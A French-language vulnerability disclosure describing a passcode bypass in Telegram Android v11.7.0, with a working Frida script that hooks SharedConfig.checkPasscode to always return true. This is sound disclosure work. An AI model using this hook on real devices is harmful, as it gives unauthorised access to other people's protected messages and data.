
Preuve de concept basée sur Frida démontrant le contournement d'authentification dans Telegram Android APK v11.7.0 en accrochant la méthode SharedConfig.checkPasscode pour qu'elle retourne toujours vrai.
Un problème dans la classe SharedConfig de l'APK Android Telegram v.11.7.0 permet à un attaquant physiquement proche de contourner l'authentification et d'élever ses privilèges en manipulant la valeur de retour de la méthode checkPasscode.
Contournement d'authentification
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
Cette vulnérabilité est un problème de contournement d'authentification côté client. Elle affecte les utilisateurs qui comptent sur la fonctionnalité de code d'accès pour sécuriser des données sensibles ou restreindre l'accès à des fonctionnalités spécifiques de l'application. En exploitant cette faille, un attaquant physiquement proche peut manipuler le processus de vérification du code d'accès, contourner l'authentification et obtenir un accès non autorisé aux zones protégées de l'application. Cela pourrait entraîner l'exposition de données utilisateur sensibles ou des actions non autorisées au sein de l'application.